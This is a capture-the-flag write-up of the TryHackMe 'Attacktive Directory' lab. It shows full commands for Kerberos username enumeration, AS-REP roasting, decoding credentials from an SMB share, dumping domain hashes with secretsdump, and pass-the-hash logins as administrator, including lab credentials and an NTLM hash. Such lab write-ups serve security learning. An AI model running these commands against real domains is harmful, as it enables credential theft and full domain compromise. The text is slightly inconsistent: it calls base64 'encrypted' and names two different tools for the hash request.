# ATTACKTIVE DIRECTORY | spookysec.local | THM

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial spookysec.local
    
### Open Ports/Services Running

* 53 - domain - Simple DNS Plus
* 80 - HTTP - Microsoft IIS 10.0
* 88 - kerberos-sec
* 135 - msrpc
* 139/445 - SMB
* 389 - LDAP
* 464 - kpasswd5?
* 593 - ncacn_http
* 636 - tcpwrapped
* 3268 - LDAP
* 3269 - tcpwrapped
* 3389 - RDP
* 5985 - winrm

## Services Enumeration

### 80 - HTTP

Webpage:

![](img/port-80.png)

gobuster result:

Nothing.

### 88 - kerberos-sec

We can use the 'kerbrute' tool to enumerate usernames.

    kerbrute userenum -t 100 -d spookysec.local --dc spookysec.local userlist.txt
    
![](img/ad-users.png)

Also got an ASREP hash from the service account:

![](img/svc-hash.png)

Turned out to be incorrect. Had to grab the real hash using getSPNUsers.py, then I cracked it to get the password 'management2005'.

Moving on to SMB.

### 139/445 - SMB

Checking the shares available, there is a backup folder with a text file inside - it is encrypted:

    YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
    
Decoded into plaintext, we get some creds:

    backup@spookysec.local:backup2517860
    
## Secretsdump

The backup user does not have the same kind of access as svc-admin (less SMB access) but it is actually the backup account for the entire DC, and therefore has a permission that allows all changes (including password hashes) synced to this account.

    secretsdump.py -dc-ip spookysec.local -just-dc spookysec.local/backup:backup2517860@spookysec.local
    
And I got all the hashes this way, including the admins hash.

## Privesc via pass-the-hash attack

With the admins hash, I don't need to crack it - I can just pass it along to authenticate.

I can use psexec/smbexec or evil-winrm to own the machine and grab all the flags.

    psexec.py spookysec.local/administrator@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
    
    evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc
    
![](img/pass-the-hash.png)

## Conclusion

An easy box that teaches you some basic ways to exploit a Domain Controller.

Steps:

* use kerbrute to enumerate usernames, find a service account and backup account
* request a ticket with GetNPUsers, receive pre-auth kerberos hash
* crack hash with hashcat
* connect to SMB with service account credentials, find text file with base64-encoded creds for backup account
* decode creds
* use secretsdump with backup account creds, recieve all the hashes
* psexec or evil-winrm as administrator
